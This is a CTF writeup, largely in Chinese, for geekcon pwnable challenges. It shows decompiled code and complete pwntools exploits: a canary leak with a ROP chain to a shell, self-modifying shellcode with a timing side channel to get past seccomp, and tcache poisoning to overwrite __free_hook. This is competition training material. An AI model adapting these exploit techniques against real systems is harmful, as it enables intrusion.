geekcon

ctf writeup

 2024/04/24 

pwnable

Memo0

有一个login函数，login success了会调用一个输出flag的函数

unsigned __int64 login()
{
  unsigned __int64 v0; // rax
  size_t v1; // rax
  _BYTE *s1; // [rsp+8h] [rbp-38h]
  char s[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v5; // [rsp+38h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  printf("Please enter your password: ");
  __isoc99_scanf("%29s", s);
  v0 = strlen(s);
  s1 = sub_12E9((__int64)s, v0);
  if ( !s1 )
  {
    puts("Error!");
    exit(-1);
  }
  v1 = strlen(s2);
  if ( memcmp(s1, s2, v1) )
  {
    puts("Password Error.");
    exit(-1);
  }
  puts("Login Success!");
  sub_1623();
  free(s1);
  return v5 - __readfsqword(0x28u);
}

三个字节转换成四个一组然后 sbox，很明显是base64，然后把索引表换了

_BYTE *__fastcall sub_12E9(__int64 a1, unsigned __int64 a2)
{
  unsigned __int64 v3; // rax
  unsigned __int64 v4; // rax
  int v5; // eax
  unsigned __int64 v6; // rax
  int v7; // eax
  __int64 v8; // rax
  int i; // [rsp+1Ch] [rbp-34h]
  int v10; // [rsp+20h] [rbp-30h]
  int v11; // [rsp+24h] [rbp-2Ch]
  unsigned int v12; // [rsp+2Ch] [rbp-24h]
  unsigned __int64 v13; // [rsp+30h] [rbp-20h]
  __int64 v14; // [rsp+38h] [rbp-18h]
  unsigned __int64 v15; // [rsp+40h] [rbp-10h]
  _BYTE *v16; // [rsp+48h] [rbp-8h]

  v15 = 4 * ((a2 + 2) / 3);
  v16 = malloc(v15 + 1);
  if ( !v16 )
    return 0LL;
  v13 = 0LL;
  v14 = 0LL;
  while ( v13 < a2 )
  {
    v3 = v13++;
    v10 = *(unsigned __int8 *)(a1 + v3);
    if ( v13 >= a2 )
    {
      v5 = 0;
    }
    else
    {
      v4 = v13++;
      v5 = *(unsigned __int8 *)(a1 + v4);
    }
    v11 = v5;
    if ( v13 >= a2 )
    {
      v7 = 0;
    }
    else
    {
      v6 = v13++;
      v7 = *(unsigned __int8 *)(a1 + v6);
    }
    v12 = (v11 << 8) + (v10 << 16) + v7;
    v16[v14] = aZyxwvutsrqponm[(v12 >> 18) & 0x3F];
    v16[v14 + 1] = aZyxwvutsrqponm[(v12 >> 12) & 0x3F];
    v16[v14 + 2] = aZyxwvutsrqponm[(v12 >> 6) & 0x3F];
    v8 = v14 + 3;
    v14 += 4LL;
    v16[v8] = aZyxwvutsrqponm[v12 & 0x3F];
  }
  for ( i = 0; i < (3 - a2 % 3) % 3; ++i )
    v16[v15 - i - 1] = '=';
  v16[v15] = 0;
  return v16;
}

直接解密拿到login用的password，login后拿到flag

Memo1

memo1在memo0的基础上去掉了backdoor函数

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int v3; // eax
  unsigned int v5; // [rsp+8h] [rbp-118h]
  char s[264]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v7; // [rsp+118h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  sub_1594(a1, a2, a3);
  puts("===================Memo Login===================");
  login();
  v5 = 0;
  while ( 1 )
  {
    while ( 1 )
    {
      v3 = sub_188A();
      if ( v3 != 4 )
        break;
      v5 = 0;
      memset(s, 0, 0x100uLL);
    }
    if ( v3 > 4 )
      break;
    switch ( v3 )
    {
      case 3:
        sub_17F2(s, v5);
        break;
      case 1:
        v5 += sub_1780(s, v5);
        break;
      case 2:
        puts("Content:");
        puts(s);
        break;
      default:
        goto LABEL_12;
    }
  }
LABEL_12:
  puts("Error Choice!");
  return 0LL;
}

在这个子函数里面存在一个有符号数转无符号数的溢出，由于程序存在canary 得控制输入数据在恰当大小下用puts把canary泄露出来，补码中接近0的负数高位全是1，所以得找一个尽可能远离0的负数，搜索八个字节有符号整数能表示的最小的数是 -9223372036854775808，所以只需要构造一个 -9223372036854775808 + size的表达式，就能控制read to buf的size

unsigned __int64 __fastcall sub_17F2(__int64 a1, unsigned int a2)
{
  __int64 v3; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  printf("How many characters do you want to change:");
  __isoc99_scanf("%lld", &v3);
  if ( a2 > v3 )
  {
    read_to_buf(a1, v3);
    puts("Done!");
  }
  return v4 - __readfsqword(0x28u);
}

通过puts去泄露libc和canary的值，然后打rop就好了

exp:

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "chall.geekctf.geekcon.top"
PORT = 40311

elf = context.binary = ELF('./memo1')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

password ="CTF_is_interesting_isn0t_it?" 
sla("Please enter your password:",password)


def add(data):
    sla("Your choice:","1")
    sla("What do you want to write in the memo:",data)

def show():
    sla("Your choice:","2")

def edit(num,data):
    sla("Your choice:","3")
    sla("How many characters do you want to change:",str(num))
    s(data)


add(b'a' * 0x10)
edit((-9223372036854775808 + (0x110 - 8 + 1)),b"G" * (0x110 - 8 + 1))
show()
ru(b"G" * (0x110 - 8))
leak_canary = u64(r(8)) & 0xffffffffffffff00
success(f"libc_base ->{hex(leak_canary)}")


payload = b'G' * (0x110 - 8) + b'G' * 0x10
edit((-9223372036854775808 + (0x118)),payload)
show()

ru(b'G' * (0x110 - 8) + b'G' * 0x10)

libc_base = u64(r(6).ljust(8,b'\x00')) - (0x732289629d90 - 0x732289600000)
success(f"libc_base ->{hex(libc_base)}")

rdi = libc_base + 0x000000000002a3e5
binsh = libc_base + next(libc.search(b'/bin/sh'))
system = libc_base + libc.sym['system']
ret = libc_base + 0x00000000000c45e3 # 0x00000000000c45e3 : sub rax, 1 ; ret

payload = b'G' * (0x110 - 8) + p64(leak_canary) + b'G' * 8 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)

edit((-9223372036854775808 + (len(payload))),payload)
sla("Your choice:","5")

p.interactive()

shellcode

好难，这个shellcode，有一个沙箱，得用侧信道爆破，不过侧信道爆破这个问题不大，难的地方在绕过这个沙箱最好的方法是 sysycall read一次，但是syscall两个字节取余后都为1，然后( (char)(*((char *)buf + i) % 2) != i % 2 ) 取余判断这里其实是存在一个溢出的，也就是说只能用 127以下的指令去实现self modifying code 造一个syscall read，能用的指令非常有限，搓出 sysycall read之后，填充大量的nop在nop后边写一个 open read cmp的逻辑，如果cmp成功就陷入一个比较大的循环，通过每次交互的时间差来判断flag的内容

处理时间差的策略是，针对每个pos 记录下 start_time 和 end_time的差，找出其中最大的差

__int64 sub_1290()
{
  __int64 result; // rax
  __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = seccomp_init(0LL);
  seccomp_rule_add(v1, 2147418112LL, 2LL, 0LL);
  seccomp_rule_add(v1, 2147418112LL, 0LL, 0LL);
  result = seccomp_load(v1);
  if ( (int)result < 0 )
  {
    perror("seccomp_load failed");
    exit(1);
  }
  return result;
}

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int i; // [rsp+0h] [rbp-10h]
  int v5; // [rsp+4h] [rbp-Ch]
  void *buf; // [rsp+8h] [rbp-8h]

  sub_1249(a1, a2, a3);
  puts("Please input your shellcode: ");
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  sub_1290();
  v5 = read(0, buf, 0x200uLL);
  for ( i = 0; i < v5; ++i )
  {
    if ( (char)(*((char *)buf + i) % 2) != i % 2 )
      return 0xFFFFFFFFLL;
  }
  ((void (*)(void))buf)();
  return 0LL;
}

exp:

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes
import time

context(os='linux', arch='amd64')
# # context.log_level='debug'

is_debug = 0

IP = "chall.geekctf.geekcon.top"
PORT = 40245

elf = context.binary = ELF('./shellcode')
libc = elf.libc


def connect():
    return remote(IP, PORT) if not is_debug else process()

# *RAX  0x730d36646000 ◂— 0x6162 /* 'ba' */
#  RBX  0x0
#  RCX  0x1
#  RDX  0x0
#  RDI  0x0
#  RSI  0x730d36646000 ◂— 0x6162 /* 'ba' */
#  R8   0x5c750189bb10 ◂— 0x5c70c6d9a48b
#  R9   0x5c750189bb10 ◂— 0x5c70c6d9a48b
#  R10  0x1
#  R11  0x246
#  R12  0x7fffc7a464e8 —▸ 0x7fffc7a47553 ◂— '/home/lhj/Desktop/geekcon/shellcode/shellcode'
#  R13  0x5c7500bd1313 ◂— endbr64 
#  R14  0x0
#  R15  0x730d36649040 (_rtld_global) —▸ 0x730d3664a2e0 —▸ 0x5c7500bd0000 ◂— 0x10102464c457f
#  RBP  0x7fffc7a463d0 ◂— 0x1
#  RSP  0x7fffc7a463c0 ◂— 0x200000002
# *RIP  0x5c7500bd13d5 ◂— call rax

# b'\x0f\x05'
# add byte ptr[rcx],al 00 01
# add dword ptr[rsi],eax 01 06

strlist = "abcdefghijklmnopqrstuvwxyz0123456789_-+=@$%^&*({}\\|/?"
flag = ''

for pos in range(0,4):

    total = 0
    str_str = 0
    for byte in strlist:
        p = connect()
        start = time.time()

        try:
            p.recvuntil('shellcode: ')
            shellcode = b"\x90\x01\x18\x59\x6a\x3b\x5a\x59\x4c\x01\x18\x59\x48\x01\x10\x59\x6a\x7f\x5a\x59\x48\x01\x10\x59\x48\x01\x10\x59\x68\x01\x00\x01\x00\x59\x50\x51\x5a\x59\x48\x31\xc0\x59\x48\x39\xd2\x59\x56\x59\x50\x51\xc2"
            p.send(shellcode)

            payload = asm('nop') * 0x10
            payload += asm(f'''
                    mov r15,rsi
                    add r15,0x100 
                    mov rax,2
                    mov rdi,r15
                    mov rsi,0
                    syscall

                    mov rax,0
                    mov rdi,3
                    mov rsi,r15
                    mov rdx,0x100
                    syscall
                   
                    mov r14,0x7fff0000
                    loop:
                        sub r14,1
                        cmp r14,0
                        jz $+200
                        mov al, byte ptr[r15+{pos}]
                        cmp al,{ord(byte)}
                        jz loop
                    ''')
            payload = payload.ljust(0x100,asm('nop'))
            payload += b'./flag\x00\x00'
            
            p.send(payload)
            p.recvuntil("aaaa")
            p.interactive()
        except:
            end = time.time()
            if end-start>total:
                str_str=byte
                total = end-start
        p.close()

    flag += str_str
    success(flag)
    if str_str == '}':
        break

success(flag)

flat

题目加了控制流平坦化，第一次做这种类型的题，找了好多项目去修复，发现都缺少逻辑，可能是题目做了什么手脚

void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  unsigned int i; // [rsp+21Ch] [rbp-164h]
  int v4; // [rsp+220h] [rbp-160h]
  int data_to_int; // [rsp+224h] [rbp-15Ch]
  unsigned int idx_4; // [rsp+228h] [rbp-158h]
  unsigned int idx; // [rsp+228h] [rbp-158h]
  unsigned int idx_3; // [rsp+228h] [rbp-158h]
  unsigned int idx_2; // [rsp+228h] [rbp-158h]
  unsigned int idx_1; // [rsp+228h] [rbp-158h]
  int choice; // [rsp+238h] [rbp-148h]

  v4 = 1;
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  while ( 1 )
  {
    do
    {
      while ( 1 )
      {
        while ( 1 )
        {
          choice = read_data_to_int();
          if ( choice < 4919 )
            break;
          if ( choice < 48879 )
          {
            if ( choice == 4919 )
            {
              idx = read_data_to_int();
              if ( idx > 0x1F || !chunk_list[idx].chunk_addr )
                exit(0);
              free((void *)chunk_list[idx].chunk_addr);
              chunk_list[idx].chunk_addr = 0LL;
              LODWORD(chunk_list[idx].chunk_size) = 0;
            }
          }
          else if ( choice < 57005 )
          {
            if ( choice == 48879 )
              exit(0);
          }
          else if ( choice == 57005 )
          {
            idx_1 = read_data_to_int();
            if ( idx_1 > 0x1F || !chunk_list[idx_1].chunk_addr || !LODWORD(chunk_list[idx_1].chunk_size) )
              exit(0);
            puts((const char *)chunk_list[idx_1].chunk_addr);
          }
        }
        if ( choice < 2989 )
          break;
        if ( choice < 4112 )
        {
          if ( choice == 2989 )
          {
            if ( !v4 )
              exit(0);
            v4 = 0;
            idx_2 = read_data_to_int();
            if ( idx_2 > 0x1F || !chunk_list[idx_2].chunk_addr || !LODWORD(chunk_list[idx_2].chunk_size) )
              exit(0);
            for ( i = 0; i < LODWORD(chunk_list[idx_2].chunk_size); ++i )
              read(0, (void *)((char)i + chunk_list[idx_2].chunk_addr), 1uLL);
          }
        }
        else if ( choice == 4112 )
        {
          idx_3 = read_data_to_int();
          if ( idx_3 > 0x1F || !chunk_list[idx_3].chunk_addr || !LODWORD(chunk_list[idx_3].chunk_size) )
            exit(0);
          read_to_buf(chunk_list[idx_3].chunk_addr, chunk_list[idx_3].chunk_size);
        }
      }
    }
    while ( choice != 768 );
    idx_4 = read_data_to_int();
    if ( idx_4 > 0x1F || LODWORD(chunk_list[idx_4].chunk_size) || chunk_list[idx_4].chunk_addr )
      exit(0);
    data_to_int = read_data_to_int();
    if ( data_to_int <= 0 || data_to_int > 2048 )
      exit(0);
    LODWORD(chunk_list[idx_4].chunk_size) = data_to_int;
    chunk_list[idx_4].chunk_addr = (__int64)malloc(data_to_int);
    read_to_buf(chunk_list[idx_4].chunk_addr, chunk_list[idx_4].chunk_size);
  }
}

只能还原成这样了，漏洞是调试出来的，我构造了很多输入，发现在只有一次使用机会的edit选项里，当chunk的 udata > 0x80 时候会把大小为 udata_size - 0x80 的数据复制到 udata_addr - 0x80的位置，也就是存在一个memcpy的逻辑

初始化chunk和另一个编辑函数都存在00截断，那只有一次memcpy的机会，怎么样同时做到tcache poison 和覆盖00位泄露地址？

思考了很久想出这样一种堆布局，memcpy 去覆盖一个inused 状态下chunk的size位置和把相邻chunk中的00 位置填充，这样不就能拿实现堆叠，通过堆叠打tcache poison 以及解决 00截断的问题吗？

利用unsortedbin 切分残留的地址去泄露libc，然后打free hook就好了

exp:

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "chall.geekctf.geekcon.top"
PORT = 40246

elf = context.binary = ELF('./flat')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)

p = connect()

def show(idx):
    sl("57005")
    sl(str(idx))

def delete(idx):
    sl("4919")
    sl(str(idx))

def create(idx,size,data):
    sl("768")
    sl(str(idx))
    sl(str(size))
    sl(data)

# 当一个堆块的size > 0x80 时, 使用 edit(idx,data),满足len(data) > 0x80, 会将 len(data) - 0x80 的大小的数据 复制到 chunk的udata - 0x80位置
def edit(idx,data):
    sl("2989")
    sl(str(idx))
    s(data)


def edit2(idx,data):
    sl("4112")
    sl(str(idx))
    sl(data)


create(0,0x500,"A" * 0x500)
create(1,0x20,"A")
delete(0)

create(2,0x10,"A") # modify this chunk->size
create(3,0x10,"A") # leak libc
create(4,0x20,b"/bin/sh")
create(5,0xb8,"C") # vuln

# 0xb8
payload = b'C' * 0x80
payload += p64(0) + p64(0x101) + b'C' * 0x18
payload += p64(0x21) + b'C' * 8
edit(5,payload)

show(3)

ru("C" * 8)
libc_base = u64(r(6).ljust(8,b'\x00')) - (0x000074274af14be0 - 0x74274ad28000)
success(f"libc_base -> {hex(libc_base)}")
system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']

create(13,0x10,"SSSS")
create(6,0x3C0 - 0x10,"SSSS") # clean unsorted bin

# heap overlap
delete(2)
delete(13)
delete(3)

free_hook_low = free_hook & 0xffffffff
free_hook_high = (free_hook >> 32) & 0xffff
create(7,0xf0,b"S" * 0x18 + p64(0x21) + p32(free_hook_low) + p16(free_hook_high))


create(8,0x10,"SSSS")
create(9,0x10,p64(system))

delete(4)

p.interactive()